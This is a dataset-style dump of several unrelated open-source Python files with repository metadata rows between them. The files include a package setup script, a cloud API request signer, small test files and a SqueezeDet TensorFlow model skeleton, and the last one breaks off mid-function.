with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='eponym',
version=__version__,
packages=find_packages(),
include_package_data=True,
license='MIT License',
description='Decent username generator based on handpicked wordlists',
long_description=README,
long_description_content_type='text/markdown',
url='https://github.com/DoctorJohn/eponym',
author='Jonathan Ehwald',
author_email='pypi@ehwald.info',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 30.742857 | 78 | 0.724907 |
2b06991a3be00249a7eb90ca63f5b5604ae67b14 | 6,185 | py | Python | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import time
import hashlib
import hmac
import re
import uuid
from . import const
from .logger import INFO
from .util import quote
class Signer(object):
ignored_headers = ['authorization', 'user-agent']
def __init__(self, logger):
self.__logger = logger
def sign(self, method, service, region, uri, headers, data, credential, security_token):
uri_dict = self.__url_path_to_dict(uri)
host = uri_dict['host']
port = uri_dict['port']
query = uri_dict['query']
canonical_uri = quote(uri_dict['path'])
if port and port not in ['80', '443']:
full_host = host + ':' + port
else:
full_host = host
now = self.__now()
jdcloud_date = now.strftime('%Y%m%dT%H%M%SZ')
datestamp = now.strftime('%Y%m%d') # Date w/o time, used in credential scope
nonce = str(uuid.uuid4())
headers[const.JDCLOUD_DATE] = jdcloud_date
headers[const.JDCLOUD_NONCE] = nonce
canonical_querystring = self.__normalize_query_string(query)
canonical_headers, signed_headers = self.__build_canonical_headers(headers, security_token, full_host)
payload_hash = self.__sha256_hash(data)
canonical_request = (method + '\n' +
canonical_uri + '\n' +
canonical_querystring + '\n' +
canonical_headers + '\n' +
signed_headers + '\n' +
payload_hash)
algorithm = const.JDCLOUD_ALGORITHM
credential_scope = (datestamp + '/' +
region + '/' +
service + '/' +
const.JDCLOUD_REQUEST)
string_to_sign = (algorithm + '\n' +
jdcloud_date + '\n' +
credential_scope + '\n' +
self.__sha256_hash(canonical_request))
self.__logger.log(INFO, '---canonical_request---\n' + canonical_request)
self.__logger.log(INFO, '----string_to_sign---\n' + string_to_sign)
signing_key = self.__get_signature_key(credential.secret_key, datestamp, region, service)
encoded = string_to_sign.encode('utf-8')
signature = hmac.new(signing_key, encoded, hashlib.sha256).hexdigest()
authorization_header = (
algorithm + ' ' +
'Credential=' + credential.access_key + '/' + credential_scope + ', ' +
'SignedHeaders=' + signed_headers + ', ' +
'Signature=' + signature
)
headers.update({
const.JDCLOUD_AUTH: authorization_header,
const.JDCLOUD_DATE: jdcloud_date,
const.JDCLOUD_CONTENT_SHA256: payload_hash,
const.JDCLOUD_ALGORITHM: const.JDCLOUD_ALGORITHM,
const.JDCLOUD_NONCE: nonce
})
if security_token:
headers.update({const.JDCLOUD_SECURITY_TOKEN: security_token})
def __normalize_query_string(self, query):
params = (list(map(str.strip, s.split("=")))
for s in query.split('&')
if len(s) > 0)
normalized = '&'.join('%s=%s' % (p[0], p[1] if len(p) > 1 else '')
for p in sorted(params))
return normalized
def __now(self):
return datetime.datetime.utcfromtimestamp(time.time())
def __url_path_to_dict(self, path):
"""http://stackoverflow.com/a/17892757/142207"""
pattern = (r'^'
r'((?P<schema>.+?)://)?'
r'((?P<user>.+?)(:(?P<password>.*?))?@)?'
r'(?P<host>.*?)'
r'(:(?P<port>\d+?))?'
r'(?P<path>/.*?)?'
r'(\?(?P<query>.*?))?'
r'$')
regex = re.compile(pattern)
match = regex.match(path)
group_dict = match.groupdict() if match is not None else None
if group_dict['path'] is None:
group_dict['path'] = '/'
if group_dict['query'] is None:
group_dict['query'] = ''
return group_dict
def __sign(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def __get_signature_key(self, key, date_stamp, region_name, service_name):
k_date = self.__sign((const.JDCLOUD2 + key).encode('utf-8'), date_stamp)
k_region = self.__sign(k_date, region_name)
k_service = self.__sign(k_region, service_name)
k_signing = self.__sign(k_service, const.JDCLOUD_REQUEST)
return k_signing
def __sha256_hash(self, val):
return hashlib.sha256(val.encode('utf-8')).hexdigest()
def __build_canonical_headers(self, req_headers, security_token, full_host):
headers = ['host'] # add host header first
signed_values = {}
for key in req_headers.keys():
value = req_headers[key]
lower_key = key.lower()
if lower_key in Signer.ignored_headers:
continue
headers.append(lower_key)
signed_values[lower_key] = value
headers.sort()
signed_headers = ';'.join(headers)
canonical_values = []
for key in headers:
if key == 'host':
canonical_values.append('host:' + full_host)
else:
canonical_values.append(key + ':' + signed_values[key])
canonical_headers = '\n'.join(canonical_values) + '\n'
return canonical_headers, signed_headers
| 35.142045 | 110 | 0.575424 |
1a4f527e408506ad2bef95c1c008b12e97f72aa4 | 285 | py | Python | it168/it168/pipelines.py | ripples-alive/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | 1 | 2017-02-24T03:34:03.000Z | 2017-02-24T03:34:03.000Z | it168/it168/pipelines.py | JayvicWen/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | null | null | null | it168/it168/pipelines.py | JayvicWen/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class It168Pipeline(object):
def process_item(self, item, spider):
return item
| 23.75 | 65 | 0.708772 |
c92def7193a320a21f1cbe2239ba52cd86236901 | 601 | py | Python | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | null | null | null | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | null | null | null | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | 1 | 2022-03-08T14:50:27.000Z | 2022-03-08T14:50:27.000Z | from __future__ import annotations
from typing import TYPE_CHECKING
from fastapi import FastAPI
from stella_api.core.utils.errors import FailureLoadVersion
if TYPE_CHECKING:
from stella_api.core.models import RouteBase
__all__ = ("StellaAPI",)
class StellaAPI(FastAPI):
def __init__(self) -> None:
super().__init__(title="Stella API")
def create_route(self, router: RouteBase) -> None:
try:
router.setup()
self.include_router(router.router, prefix=router.prefix)
except Exception:
raise FailureLoadVersion(router.prefix)
| 24.04 | 68 | 0.705491 |
f153ab57d43ae44c48f5e61396700dcb09e5342a | 1,363 | py | Python | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 55 | 2019-12-20T03:25:14.000Z | 2022-01-16T07:19:47.000Z | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 2 | 2020-11-02T08:01:00.000Z | 2022-03-27T02:59:18.000Z | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 11 | 2020-08-06T03:59:45.000Z | 2022-02-25T02:31:59.000Z | """
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .abstract_project import AbstractProject
from .cgc_project import CGCProject
from .linux_project import LinuxProject
from .target import Target
from .windows_project import WindowsProject, WindowsDLLProject, \
WindowsDriverProject
| 43.967742 | 78 | 0.807043 |
cdbccb8f6348c1557ac207e7ad254dc7d3afc47b | 428 | py | Python | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | import json
import unittest
from nuplan.database.utils.label.label import Label
class TestLabel(unittest.TestCase):
def test_serialize(self) -> None:
""" Tests a serialized label are still the same after serializing. """
label = Label('my_name', (1, 3, 4, 1))
self.assertEqual(label, Label.deserialize(json.loads(json.dumps(label.serialize()))))
if __name__ == '__main__':
unittest.main()
| 23.777778 | 93 | 0.686916 |
dba5ba1835c02ae65c97733030f3ccce9d5d4f46 | 747 | py | Python | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | import numpy as np
from scipy.ndimage import gaussian_filter
import os
import inspect
import sys
from nose.tools import nottest
LOCATION = "/".join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))).split("/")[:-1])
sys.path.insert(0, LOCATION)
from powerbox import PowerBox
@nottest # this is not passing to desired tolerance at this point... not sure if this is a problem. It's not systematic.
def test_resolution():
var = [0]*6
for i in range(6):
pb = PowerBox(64*2**i, dim=2, pk=lambda k: 1.0*k ** -2., boxlength=1.0, angular_freq=True)
var[i] = np.var(gaussian_filter(pb.delta_x(),sigma=2**i,mode='wrap'))
print(var/var[0])
assert np.allclose(var/var[0],1,atol=1e-2)
| 35.571429 | 137 | 0.680054 |
c7669aa0c36a21c08102c025455be69fef5029da | 27,165 | py | Python | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | 2 | 2017-05-25T01:26:41.000Z | 2019-08-16T13:38:57.000Z | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | null | null | null | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | 1 | 2019-02-17T05:19:29.000Z | 2019-02-17T05:19:29.000Z | # Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""Neural network model base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
def _add_loss_summaries(total_loss):
"""Add summaries for losses
Generates loss summaries for visualizing the performance of the network.
Args:
total_loss: Total loss from loss().
"""
losses = tf.get_collection('losses')
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
tf.summary.scalar(l.op.name, l)
def _variable_on_device(name, shape, initializer, trainable=True):
"""Helper to create a Variable.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
# TODO(bichen): fix the hard-coded data type below
dtype = tf.float32
if not callable(initializer):
var = tf.get_variable(name, initializer=initializer, trainable=trainable)
else:
var = tf.get_variable(
name, shape, initializer=initializer, dtype=dtype, trainable=trainable)
return var
def _variable_with_weight_decay(name, shape, wd, initializer, trainable=True):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
var = _variable_on_device(name, shape, initializer, trainable)
if wd is not None and trainable:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
class ModelSkeleton:
"""Base class of NN detection models."""
def __init__(self, mc):
self.mc = mc
# image batch input
self.image_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3],
name='image_input'
)
# a scalar tensor in range (0, 1]. Usually set to 0.5 in training phase and
# 1.0 in evaluation phase
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
# A tensor where an element is 1 if the corresponding box is "responsible"
# for detection an object and 0 otherwise.
self.input_mask = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 1], name='box_mask')
# Tensor used to represent bounding box deltas.
self.box_delta_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_delta_input')
# Tensor used to represent bounding box coordinates.
self.box_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_input')
# Tensor used to represent labels
self.labels = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES], name='labels')
# Tensor representing the IOU between predicted bbox and gt bbox
self.ious = tf.Variable(
initial_value=np.zeros((mc.BATCH_SIZE, mc.ANCHORS)), trainable=False,
name='iou', dtype=tf.float32
)
# model parameters
self.model_params = []
# model size counter
self.model_size_counter = [] # array of tuple of layer name, parameter size
# flop counter
self.flop_counter = [] # array of tuple of layer name, flop number
# activation counter
self.activation_counter = [] # array of tuple of layer name, output activations
self.activation_counter.append(('input', mc.IMAGE_WIDTH*mc.IMAGE_HEIGHT*3))
def _add_forward_graph(self):
"""NN architecture specification."""
raise NotImplementedError
def _add_interpretation_graph(self):
"""Interpret NN output."""
mc = self.mc
with tf.variable_scope('interpret_output') as scope:
preds = self.preds
# probability
num_class_probs = mc.ANCHOR_PER_GRID*mc.CLASSES
self.pred_class_probs = tf.reshape(
tf.nn.softmax(
tf.reshape(
preds[:, :, :, :num_class_probs],
[-1, mc.CLASSES]
)
),
[mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES],
name='pred_class_probs'
)
# confidence
num_confidence_scores = mc.ANCHOR_PER_GRID+num_class_probs
self.pred_conf = tf.sigmoid(
tf.reshape(
preds[:, :, :, num_class_probs:num_confidence_scores],
[mc.BATCH_SIZE, mc.ANCHORS]
),
name='pred_confidence_score'
)
# bbox_delta
self.pred_box_delta = tf.reshape(
preds[:, :, :, num_confidence_scores:],
[mc.BATCH_SIZE, mc.ANCHORS, 4],
name='bbox_delta'
)
# number of object. Used to normalize bbox and classification loss
self.num_objects = tf.reduce_sum(self.input_mask, name='num_objects')
with tf.variable_scope('bbox') as scope:
with tf.variable_scope('stretching'):
delta_x, delta_y, delta_w, delta_h = tf.unstack(
self.pred_box_delta, axis=2)
anchor_x = mc.ANCHOR_BOX[:, 0]
anchor_y = mc.ANCHOR_BOX[:, 1]
anchor_w = mc.ANCHOR_BOX[:, 2]
anchor_h = mc.ANCHOR_BOX[:, 3]
box_center_x = tf.identity(
anchor_x + delta_x * anchor_w, name='bbox_cx')
box_center_y = tf.identity(
anchor_y + delta_y * anchor_h, name='bbox_cy')
box_width = tf.identity(
anchor_w * util.safe_exp(delta_w, mc.EXP_THRESH),
name='bbox_width')
box_height = tf.identity(
anchor_h * util.safe_exp(delta_h, mc.EXP_THRESH),
name='bbox_height')
self._activation_summary(delta_x, 'delta_x')
self._activation_summary(delta_y, 'delta_y')
self._activation_summary(delta_w, 'delta_w')
self._activation_summary(delta_h, 'delta_h')
self._activation_summary(box_center_x, 'bbox_cx')
self._activation_summary(box_center_y, 'bbox_cy')
self._activation_summary(box_width, 'bbox_width')
self._activation_summary(box_height, 'bbox_height')
with tf.variable_scope('trimming'):
xmins, ymins, xmaxs, ymaxs = util.bbox_transform(
[box_center_x, box_center_y, box_width, box_height])
# The max x position is mc.IMAGE_WIDTH - 1 since we use zero-based
# pixels. Same for y.
xmins = tf.minimum(
tf.maximum(0.0, xmins), mc.IMAGE_WIDTH-1.0, name='bbox_xmin')
self._activation_summary(xmins, 'box_xmin')
ymins = tf.minimum(
tf.maximum(0.0, ymins), mc.IMAGE_HEIGHT-1.0, name='bbox_ymin')
self._activation_summary(ymins, 'box_ymin')
xmaxs = tf.maximum(
tf.minimum(mc.IMAGE_WIDTH-1.0, xmaxs), 0.0, name='bbox_xmax')
self._activation_summary(xmaxs, 'box_xmax')
ymaxs = tf.maximum(
tf.minimum(mc.IMAGE_HEIGHT-1.0, ymaxs), 0.0, name='bbox_ymax')
self._activation_summary(ymaxs, 'box_ymax')
self.det_boxes = tf.transpose(
tf.stack(util.bbox_transform_inv([xmins, ymins, xmaxs, ymaxs])),
(1, 2, 0), name='bbox'
)
with tf.variable_scope('IOU'):
def _tensor_iou(box1, box2):
with tf.variable_scope('intersection'):
xmin = tf.maximum(box1[0], box2[0], name='xmin')
ymin = tf.maximum(box1[1], box2[1], name='ymin')
xmax = tf.minimum(box1[2], box2[2], name='xmax')
ymax = tf.minimum(box1[3], box2[3], name='ymax')
w = tf.maximum(0.0, xmax-xmin, name='inter_w')
h = tf.maximum(0.0, ymax-ymin, name='inter_h')
intersection = tf.multiply(w, h, name='intersection')
with tf.variable_scope('union'):
w1 = tf.subtract(box1[2], box1[0], name='w1')
h1 = tf.subtract(box1[3], box1[1], name='h1')
w2 = tf.subtract(box2[2], box2[0], name='w2')
h2 = tf.subtract(box2[3], box2[1], name='h2')
union = w1*h1 + w2*h2 - intersection
return intersection/(union+mc.EPSILON) \
* tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS])
self.ious = self.ious.assign(
_tensor_iou(
util.bbox_transform(tf.unstack(self.det_boxes, axis=2)),
util.bbox_transform(tf.unstack(self.box_input, axis=2))
)
)
self._activation_summary(self.ious, 'conf_score')
with tf.variable_scope('probability') as scope:
self._activation_summary(self.pred_class_probs, 'class_probs')
probs = tf.multiply(
self.pred_class_probs,
tf.reshape(self.pred_conf, [mc.BATCH_SIZE, mc.ANCHORS, 1]),
name='final_class_prob'
)
self._activation_summary(probs, 'final_class_prob')
self.det_probs = tf.reduce_max(probs, 2, name='score')
self.det_class = tf.argmax(probs, 2, name='class_idx')
def _add_loss_graph(self):
"""Define the loss operation."""
mc = self.mc
with tf.variable_scope('class_regression') as scope:
# cross-entropy: q * -log(p) + (1-q) * -log(1-p)
# add a small value into log to prevent blowing up
self.class_loss = tf.truediv(
tf.reduce_sum(
(self.labels*(-tf.log(self.pred_class_probs+mc.EPSILON))
+ (1-self.labels)*(-tf.log(1-self.pred_class_probs+mc.EPSILON)))
* self.input_mask * mc.LOSS_COEF_CLASS),
self.num_objects,
name='class_loss'
)
tf.add_to_collection('losses', self.class_loss)
with tf.variable_scope('confidence_score_regression') as scope:
input_mask = tf.reshape(self.input_mask, [mc.BATCH_SIZE, mc.ANCHORS])
self.conf_loss = tf.reduce_mean(
tf.reduce_sum(
tf.square((self.ious - self.pred_conf))
* (input_mask*mc.LOSS_COEF_CONF_POS/self.num_objects
+(1-input_mask)*mc.LOSS_COEF_CONF_NEG/(mc.ANCHORS-self.num_objects)),
reduction_indices=[1]
),
name='confidence_loss'
)
tf.add_to_collection('losses', self.conf_loss)
tf.summary.scalar('mean iou', tf.reduce_sum(self.ious)/self.num_objects)
with tf.variable_scope('bounding_box_regression') as scope:
self.bbox_loss = tf.truediv(
tf.reduce_sum(
mc.LOSS_COEF_BBOX * tf.square(
self.input_mask*(self.pred_box_delta-self.box_delta_input))),
self.num_objects,
name='bbox_loss'
)
tf.add_to_collection('losses', self.bbox_loss)
# add above losses as well as weight decay losses to form the total loss
self.loss = tf.add_n(tf.get_collection('losses'), name='total_loss')
def _add_train_graph(self):
"""Define the training operation."""
mc = self.mc
self.global_step = tf.Variable(0, name='global_step', trainable=False)
lr = tf.train.exponential_decay(mc.LEARNING_RATE,
self.global_step,
mc.DECAY_STEPS,
mc.LR_DECAY_FACTOR,
staircase=True)
tf.summary.scalar('learning_rate', lr)
_add_loss_summaries(self.loss)
opt = tf.train.MomentumOptimizer(learning_rate=lr, momentum=mc.MOMENTUM)
grads_vars = opt.compute_gradients(self.loss, tf.trainable_variables())
with tf.variable_scope('clip_gradient') as scope:
for i, (grad, var) in enumerate(grads_vars):
grads_vars[i] = (tf.clip_by_norm(grad, mc.MAX_GRAD_NORM), var)
apply_gradient_op = opt.apply_gradients(grads_vars, global_step=self.global_step)
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name, var)
for grad, var in grads_vars:
if grad is not None:
tf.summary.histogram(var.op.name + '/gradients', grad)
with tf.control_dependencies([apply_gradient_op]):
self.train_op = tf.no_op(name='train')
def _add_viz_graph(self):
"""Define the visualization operation."""
mc = self.mc
self.image_to_show = tf.placeholder(
tf.float32, [None, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3],
name='image_to_show'
)
self.viz_op = tf.summary.image('sample_detection_results',
self.image_to_show, collections='image_summary',
max_outputs=mc.BATCH_SIZE)
def _conv_bn_layer(
self, inputs, conv_param_name, bn_param_name, scale_param_name, filters,
size, stride, padding='SAME', freeze=False, relu=True,
conv_with_bias=False, stddev=0.001):
""" Convolution + BatchNorm + [relu] layer. Batch mean and var are treated
as constant. Weights have to be initialized from a pre-trained model or
restored from a checkpoint.
Args:
inputs: input tensor
conv_param_name: name of the convolution parameters
bn_param_name: name of the batch normalization parameters
scale_param_name: name of the scale parameters
filters: number of output filters.
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
freeze: if true, then do not train the parameters in this layer.
xavier: whether to use xavier weight initializer or not.
relu: whether to use relu or not.
conv_with_bias: whether or not add bias term to the convolution output.
stddev: standard deviation used for random weight initializer.
Returns:
A convolutional layer operation.
"""
mc = self.mc
with tf.variable_scope(conv_param_name) as scope:
channels = inputs.get_shape()[3]
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
kernel_val = np.transpose(cw[conv_param_name][0], [2,3,1,0])
if conv_with_bias:
bias_val = cw[conv_param_name][1]
mean_val = cw[bn_param_name][0]
var_val = cw[bn_param_name][1]
gamma_val = cw[scale_param_name][0]
beta_val = cw[scale_param_name][1]
else:
kernel_val = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
if conv_with_bias:
bias_val = tf.constant_initializer(0.0)
mean_val = tf.constant_initializer(0.0)
var_val = tf.constant_initializer(1.0)
gamma_val = tf.constant_initializer(1.0)
beta_val = tf.constant_initializer(0.0)
# re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with
# shape [h, w, in, out]
kernel = _variable_with_weight_decay(
'kernels', shape=[size, size, int(channels), filters],
wd=mc.WEIGHT_DECAY, initializer=kernel_val, trainable=(not freeze))
self.model_params += [kernel]
if conv_with_bias:
biases = _variable_on_device('biases', [filters], bias_val,
trainable=(not freeze))
self.model_params += [biases]
gamma = _variable_on_device('gamma', [filters], gamma_val,
trainable=(not freeze))
beta = _variable_on_device('beta', [filters], beta_val,
trainable=(not freeze))
mean = _variable_on_device('mean', [filters], mean_val, trainable=False)
var = _variable_on_device('var', [filters], var_val, trainable=False)
self.model_params += [gamma, beta, mean, var]
conv = tf.nn.conv2d(
inputs, kernel, [1, stride, stride, 1], padding=padding,
name='convolution')
if conv_with_bias:
conv = tf.nn.bias_add(conv, biases, name='bias_add')
conv = tf.nn.batch_normalization(
conv, mean=mean, variance=var, offset=beta, scale=gamma,
variance_epsilon=mc.BATCH_NORM_EPSILON, name='batch_norm')
self.model_size_counter.append(
(conv_param_name, (1+size*size*int(channels))*filters)
)
out_shape = conv.get_shape().as_list()
num_flops = \
(1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2]
if relu:
num_flops += 2*filters*out_shape[1]*out_shape[2]
self.flop_counter.append((conv_param_name, num_flops))
self.activation_counter.append(
(conv_param_name, out_shape[1]*out_shape[2]*out_shape[3])
)
if relu:
return tf.nn.relu(conv)
else:
return conv
def _conv_layer(
self, layer_name, inputs, filters, size, stride, padding='SAME',
freeze=False, xavier=False, relu=True, stddev=0.001):
"""Convolutional layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
filters: number of output filters.
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
freeze: if true, then do not train the parameters in this layer.
xavier: whether to use xavier weight initializer or not.
relu: whether to use relu or not.
stddev: standard deviation used for random weight initializer.
Returns:
A convolutional layer operation.
"""
mc = self.mc
use_pretrained_param = False
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
if layer_name in cw:
kernel_val = np.transpose(cw[layer_name][0], [2,3,1,0])
bias_val = cw[layer_name][1]
# check the shape
if (kernel_val.shape ==
(size, size, inputs.get_shape().as_list()[-1], filters)) \
and (bias_val.shape == (filters, )):
use_pretrained_param = True
else:
print ('Shape of the pretrained parameter of {} does not match, '
'use randomly initialized parameter'.format(layer_name))
else:
print ('Cannot find {} in the pretrained model. Use randomly initialized '
'parameters'.format(layer_name))
if mc.DEBUG_MODE:
print('Input tensor shape to {}: {}'.format(layer_name, inputs.get_shape()))
with tf.variable_scope(layer_name) as scope:
channels = inputs.get_shape()[3]
# re-order the caffe kernel with shape [out, in, h, w] -> tf kernel with
# shape [h, w, in, out]
if use_pretrained_param:
if mc.DEBUG_MODE:
print ('Using pretrained model for {}'.format(layer_name))
kernel_init = tf.constant(kernel_val , dtype=tf.float32)
bias_init = tf.constant(bias_val, dtype=tf.float32)
elif xavier:
kernel_init = tf.contrib.layers.xavier_initializer_conv2d()
bias_init = tf.constant_initializer(0.0)
else:
kernel_init = tf.truncated_normal_initializer(
stddev=stddev, dtype=tf.float32)
bias_init = tf.constant_initializer(0.0)
kernel = _variable_with_weight_decay(
'kernels', shape=[size, size, int(channels), filters],
wd=mc.WEIGHT_DECAY, initializer=kernel_init, trainable=(not freeze))
biases = _variable_on_device('biases', [filters], bias_init,
trainable=(not freeze))
self.model_params += [kernel, biases]
conv = tf.nn.conv2d(
inputs, kernel, [1, stride, stride, 1], padding=padding,
name='convolution')
conv_bias = tf.nn.bias_add(conv, biases, name='bias_add')
if relu:
out = tf.nn.relu(conv_bias, 'relu')
else:
out = conv_bias
self.model_size_counter.append(
(layer_name, (1+size*size*int(channels))*filters)
)
out_shape = out.get_shape().as_list()
num_flops = \
(1+2*int(channels)*size*size)*filters*out_shape[1]*out_shape[2]
if relu:
num_flops += 2*filters*out_shape[1]*out_shape[2]
self.flop_counter.append((layer_name, num_flops))
self.activation_counter.append(
(layer_name, out_shape[1]*out_shape[2]*out_shape[3])
)
return out
def _pooling_layer(
self, layer_name, inputs, size, stride, padding='SAME'):
"""Pooling layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
size: kernel size.
stride: stride
padding: 'SAME' or 'VALID'. See tensorflow doc for detailed description.
Returns:
A pooling layer operation.
"""
with tf.variable_scope(layer_name) as scope:
out = tf.nn.max_pool(inputs,
ksize=[1, size, size, 1],
strides=[1, stride, stride, 1],
padding=padding)
activation_size = np.prod(out.get_shape().as_list()[1:])
self.activation_counter.append((layer_name, activation_size))
return out
def _fc_layer(
self, layer_name, inputs, hiddens, flatten=False, relu=True,
xavier=False, stddev=0.001):
"""Fully connected layer operation constructor.
Args:
layer_name: layer name.
inputs: input tensor
hiddens: number of (hidden) neurons in this layer.
flatten: if true, reshape the input 4D tensor of shape
(batch, height, weight, channel) into a 2D tensor with shape
(batch, -1). This is used when the input to the fully connected layer
is output of a convolutional layer.
relu: whether to use relu or not.
xavier: whether to use xavier weight initializer or not.
stddev: standard deviation used for random weight initializer.
Returns:
A fully connected layer operation.
"""
mc = self.mc
use_pretrained_param = False
if mc.LOAD_PRETRAINED_MODEL:
cw = self.caffemodel_weight
if layer_name in cw:
use_pretrained_param = True
